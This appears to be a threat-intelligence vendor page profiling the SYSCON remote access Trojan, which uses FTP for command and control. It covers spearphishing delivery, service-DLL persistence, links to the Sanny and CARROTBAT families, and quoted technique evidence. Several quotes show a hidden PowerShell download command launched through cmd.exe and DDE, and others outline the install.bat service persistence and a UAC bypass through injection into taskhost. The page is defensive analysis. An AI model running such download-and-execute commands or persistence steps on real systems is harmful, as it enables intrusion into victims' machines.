SYSCON is a Windows remote access Trojan that uses FTP rather than more typical HTTP- or socket-based channels for command and control. It has been delivered through spearphishing attachments, including malicious macro-enabled Microsoft Word documents using humanitarian and North Korea-themed lures, and has also appeared in campaigns where a separate dropper retrieved and launched the implant. The infection chain commonly decodes an embedded payload, extracts architecture-specific components, and installs a malicious service DLL to achieve persistence. Reported variants have used UAC-bypass techniques and service reconfiguration so the backdoor runs under svchost.exe and survives reboot.
Once installed, SYSCON identifies victims by computer name, polls an FTP-hosted command repository, and processes commands addressed either broadly or to a specific host. It supports arbitrary command execution through the Windows command shell, file upload and download operations, configuration replacement, deployment and execution of additional tools, and collection of host information. Documented reconnaissance includes enumerating running processes with tasklist and gathering system information. The malware stages output into compressed archives, applies custom encoding, and uploads results back to attacker-controlled infrastructure, enabling exfiltration and post-compromise tasking.
SYSCON has been associated with campaigns targeting humanitarian aid organizations and entities of interest related to the Korean Peninsula, with observed victim geography including parts of East and Southeast Asia and at least one British government target in a spearphishing incident. Multiple analyses have noted structural and encoding similarities between SYSCON and the Sanny malware family, suggesting a possible shared developer or operator, though definitive attribution remains uncertain. SYSCON has also been linked operationally with campaigns involving CARROTBAT and later OceanSalt payload delivery, indicating use within broader intrusion activity rather than as a standalone commodity implant.
Mallory pivots from this family to the IOCs, detections, and named campaigns that touch your stack, and pages you when something new lands.
22 distinct techniques documented for this family, organized by ATT&CK tactic.
"cmd.exe \"/k PowerShell.exe -ExecutionPolicy bypass -windowstyle hidden -noprofile -command (New-Object System.Net.WebClient).DownloadFile(...)\""
The content repeatedly describes threat actors and malware using cmd.exe, the Windows command shell, to execute commands, launch payloads, run batch files, and automate actions on compromised hosts.
"The attached document leverages a DDE exploit to ultimately execute the following code: c:\\windows\\system32\\cmd.exe ... PowerShell.exe ... DownloadFile(...)"
Install.bat copies two files: ipnet.dll (the main file) and ipnet.ini (configuration file) into %Windows%\System32 , configures new malicious COMSysApp service using the sc command line utility, adds the service parameters into the registry, starts the malicious service
it either directly executes install.bat (for older Windows versions) or injects dummy.dll into the taskhost(ex) process
Install.bat copies two files: ipnet.dll (the main file) and ipnet.ini (configuration file) into %Windows%\System32 , configures new malicious COMSysApp service using the sc command line utility, adds the service parameters into the registry, starts the malicious service
This does two things: it sets up the backdoor’s autostart routine, and deletes some traces of its previous activity, making detection more difficult.
uacme.exe , as the name suggests, determines the operating system version. Based on that information, it either directly executes install.bat (for older Windows versions) or injects dummy.dll into the taskhost(ex) process, which attempts to execute install.bat without a UAC prompt appearing.
Each document contains two long strings, with Base64 encoding using a custom alphabet.
"download a remote executable file named 0_31.doc, which in turn is placed... with the filename of AAA.exe"
Tasklist can be used to discover processes running on a system. Numerous malware families and threat groups are described as listing running processes, collecting PIDs, checking for specific process names, or enumerating loaded modules.
The content repeatedly describes malware and threat actors collecting OS version, computer name, architecture, CPU, memory, disk, BIOS, language, and other host details; examples include use of commands such as ver, systeminfo, hostname, uname -m, and WMI to gather host information. | Multiple entries explicitly state use of the Windows systeminfo command, e.g., 'BlackEnergy has used Systeminfo to gather the OS version...' and 'OilRig has run hostname and systeminfo on a victim.'
Usually, these are done via HTTP or other TCP/IP connections. However, we recently encountered a botnet that uses a more unusual method: an FTP server that, in effect, acts as a C&C server.
Decoding the configuration reveals a URL for the byethost free FTP service provider, as well as a set of login credentials. The backdoor ... logs into the FTP server using the credentials in the configuration file, enters the /htdocs/ directory, and monitors existing .txt file names.
44 indicators attributed across vendor reports, sandbox runs, and researcher write-ups. Full values are available in Mallory.
IPs, domains, and DNS infrastructure linked to this family.
File hashes (MD5, SHA-1, SHA-256) from samples and reports.
Other indicator types observed in public reporting.
11 sources tracked across advisories, community write-ups, and news. New activity surfaces here as Mallory finds it.
Malware executed by luring victims to open malicious email attachments.
Backdoor malware that uses Tasklist to list running processes.
Malware executed through malicious email attachments.
Unsophisticated RAT using FTP for C2; observed as an early payload delivered in the Fractured Block activity and in a Dec 2017 spearphishing attack against a British government agency.
Match every observed IP, domain, and hash against your live telemetry.
Named campaigns wielding this family, with evidence pinned to each claim.
CVEs this family uses for access and lateral movement.
YARA, Sigma, Snort, and vendor rules, auto-deployed to your SIEM.
Every documented technique, ranked by evidence weight.
Reddit, Mastodon, and CTI community discussion around this family.